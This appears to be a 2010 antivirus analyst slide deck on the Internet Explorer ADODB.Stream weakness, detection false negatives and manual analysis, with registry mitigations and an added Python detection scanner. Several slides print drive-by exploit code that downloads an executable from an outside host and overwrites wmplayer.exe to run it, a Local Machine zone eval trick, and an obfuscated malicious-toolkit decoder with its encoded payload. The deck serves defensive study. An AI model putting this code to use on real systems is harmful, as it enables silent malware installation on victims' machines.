Shasta Console Operations February 2010 Tony Caleb
Page 1: Shasta Console Operations

Shasta Console Operations

February 2010, Tony Caleb

Page 2: Shasta Console Operations

Agenda

Dynamic Analysis

AV/IS FN Detection

MSIE ADODB.Stream Object Installation Weakness

Page 3: Shasta Console Operations

Introduction

The MSIE ADODB.Stream Object Installation Weakness is a browser exploit that allows attackers to attack a system through the browser, install their ActiveX controls and take over the victim's system.

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC

ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT

This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. – SECURITY FOCUS

Page 4: Shasta Console Operations

How does it occur?

Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).

Page 5: Shasta Console Operations

What does it do on an infected machine?

This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system.

The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer.

An error is displayed on the page while the script is executing. It makes the user think that an error has simply occurred and the page has not loaded, while the malicious content is downloaded to the system without the user's knowledge.

error.jsp is a JSP page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>

(just to send a false HTTP 401 Unauthorized header to IE)

Page 6: Shasta Console Operations

Sample Code

' ADO constants used below
const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

' Fetch the executable with XMLHTTP and keep the raw body
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET", "http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE", false
xmlHTTP.send
contents = xmlHTTP.responseBody

' Open a binary ADODB.Stream and write the body to disk
Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open
oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
</script>

How a file is downloaded onto a victim's system

Page 7: Shasta Console Operations

Sample Code

// Fetch the payload with XMLHTTP (synchronous request)
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe", 0);
x.Send();

// Write the response body to disk through a binary ADODB.Stream
// (Mode 3 = adModeReadWrite, Type 1 = adTypeBinary, 2 = adSaveCreateOverwrite)
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);

// Trigger Windows Media Player so the overwritten binary runs
location.href = "mms://";

How this exploit is carried out through wmplayer.exe

Page 8: Shasta Console Operations

Modification of wmplayer.exe

<script language="javascript">
// Turn the textarea contents into a single line that survives embedding in a javascript: URL
function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i = 0; i < lines.length; i++) {
        line = lines[i];
        if (line != '') {
            result += line + '\\r\\n';
        }
    }
    return result;
}

// Re-open the "_media" window with a file: javascript: URL so the code runs in the Local Machine zone
function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL, "_media");
}

window.open("error.jsp", "_media");
setTimeout("doit()", 5000);
</script>

Code for the modification of Windows Media Player

Page 9: Shasta Console Operations

How to Overcome This Issue

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}

Changing the keys in the Registry

Disabling of ActiveX controls

Disable ActiveX controls of every kind in the Internet Explorer security settings, so that nothing can be downloaded automatically (in older versions of Internet Explorer this is not possible, however).

Page 10: Shasta Console Operations

Changing the keys in the Registry

1. Close any open Internet Explorer browser windows.
2. Click Start, and then click Run.
3. In the Open box, type Regedit, and then click OK.
4. In Registry Editor, locate the following registry key:
5. "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
6. Right-click ActiveX Compatibility, point to New, and then click Key.
7. Type the following name for the key:
8. {00000566-0000-0010-8000-00AA006D2EA4}
9. Close Registry Editor.

Page 11: Shasta Console Operations

Samples of FN Detection

MSIE Event Object Mem Corruption Code Exec

HTTP MSIE Style Tag Cmt Mem Corruption

The domain "khan.co.kr" (URL http://gallery.khan.co.kr/) is reported to carry the above threat, but during manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS.

This is a common FN that we find with IS. Here a script that redirects to malicious links is delivered in encoded form; because the redirect link is not active at the time, NIS does not flag it, but the link changes dynamically. That the script tag is placed after the closing html tag clearly shows the malicious content was inserted intentionally.

Trojan.Malscript.B

The domain Voy.com (URL http://www.voy.com//76583) is reported to carry the above threat, but during manual analysis of this URL the AV/IS fail to detect it.

Page 12: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Page 14: Shasta Console Operations

MSIE Event Object Mem Corruption Code Exec

Code in the index2.html



Page 16: Shasta Console Operations

HTTP MSIE Style Tag Cmt Mem Corruption

The /* comment is only closed after the end of the style tag, about 80,000 lines of garbage later. Because of all this inserted junk, the memory stack overflows and as a result the entire browser crashes.

<!-- google_ad_section_start -->
<style type=text/css>
body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}
form{visibility:hidden;}
table{visibility:hidden;}
a{visibility:hidden;}
img{visibility:hidden;}
input{visibility:hidden;}
</style>
<A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? >
<style>@; /*<<BR>

URL : hxxp://www.voy.com//76583/
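An added detection example, not part of the deck: a small Python scanner that flags the page-source indicators walked through above, namely the Microsoft.XMLHTTP fetch followed by ADODB.Stream.SaveToFile (pages 6 and 7), a script tag placed after the closing html tag (page 11), the eval(function(p,a,c,k,e,d) packer header from index2.html (page 14) and a /* opened inside a style tag that is never closed (page 16). The sample pages are constructed here; none is captured from the sites named in the deck.

```python
import re

# Static indicators taken from the slides: the XMLHTTP fetch plus
# ADODB.Stream.SaveToFile drop (pages 6-7) and the eval(function(p,a,c,k,e,d)
# packer header that wrapped the index2.html payload (page 14).
RULES = {
    "xmlhttp_fetch": re.compile(r"Microsoft\.XMLHTTP", re.I),
    "adodb_stream_dropper": re.compile(r"ADODB\.Stream.*?\.SaveToFile", re.I | re.S),
    "packed_eval": re.compile(r"eval\(\s*function\s*\(p,a,c,k,e,[dr]\)", re.I),
}


def script_after_html_close(html):
    """Page 11: a <script> after </html> is where the encoded redirector sat."""
    end = re.search(r"</html\s*>", html, re.I)
    return bool(end) and re.search(r"<script\b", html[end.end():], re.I) is not None


def unterminated_style_comment(html):
    """Page 16: a '/*' opened inside <style> that is never closed with '*/'."""
    blocks = re.findall(r"<style\b[^>]*>(.*?)(?:</style\s*>|$)", html, re.I | re.S)
    return any(b.count("/*") > b.count("*/") for b in blocks)


def scan(html):
    """Return the names of every indicator that fires on one page's source."""
    hits = [name for name, rx in RULES.items() if rx.search(html)]
    if script_after_html_close(html):
        hits.append("script_after_html_close")
    if unterminated_style_comment(html):
        hits.append("unterminated_style_comment")
    return hits


# Constructed samples; none is captured from the sites named in the slides.
DROPPER = ('<html><body><script>var x = new ActiveXObject("Microsoft.XMLHTTP");\n'
           'x.Open("GET", "http://example.invalid/p.exe", 0); x.Send();\n'
           'var s = new ActiveXObject("ADODB.Stream"); s.Open(); s.Write(x.responseBody);\n'
           's.SaveToFile("C:\\\\dropped.exe", 2);</script></body></html>')
TRAILING = '<html><body>Gallery</body></html>\n<script>location="http://example.invalid/r"</script>'
PACKED = "<html><script>eval(function(p,a,c,k,e,d){return p}('g a=1b;',62,2,'x'.split('|'),0,{}))</script></html>"
STYLE = ("<html><head><style>body{visibility:hidden;}</style>\n<style>@; /*\n"
         + "garbage\n" * 3 + "</head></html>")
BENIGN = "<html><head><style>/* reset */ body{margin:0}</style></head><body><script>var a=1;</script></body></html>"

if __name__ == "__main__":
    for label, page in [("dropper", DROPPER), ("trailing", TRAILING), ("packed", PACKED), ("style", STYLE), ("benign", BENIGN)]:
        print(label, scan(page))
```

These are coarse string heuristics meant to triage pages that the AV/IS missed; a hit still needs the manual analysis described in the following slides.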

Page 17: Shasta Console Operations

Manual Analysis

How we do the manual analysis

Tools we use for manual analysis

Samples

Page 18: Shasta Console Operations

Tools Used for Manual Analysis

HTTP Analyzer

TCP Viewer

Process Explorer

Systracer (System Tracer)

Startup programs (msconfig, services.msc)

Page 19: Shasta Console Operations

HTTP Malicious Toolkit Variant Activity

From URL:

<script language=JavaScript>
function bfbn15(p) {
    var h = p.length, k = 1024, s, i, c, z = 0, d = 0, j = 0,
        t = Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);
    // Decode the payload in chunks of 1024 characters and eval each chunk
    for (i = Math.ceil(h / k); i > 0; i--) {
        c = '';
        for (s = Math.min(h, k); s > 0; s--, h--) {
            // Map each character through the substitution table and pack it into j
            j |= (t[p.charCodeAt(z++) - 48]) << d;
            if (d) {
                c += String.fromCharCode(129 ^ (j & 255));   // XOR-decode one byte
                j >>= 8;
                d -= 2;
            } else {
                d = 6;
            }
        }
        eval(c);
    }
}
bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')
</script>

After Decoding


Page 20: Shasta Console Operations

HTTP Malicious Toolkit Variant Activity

Page 22: Shasta Console Operations

Thank You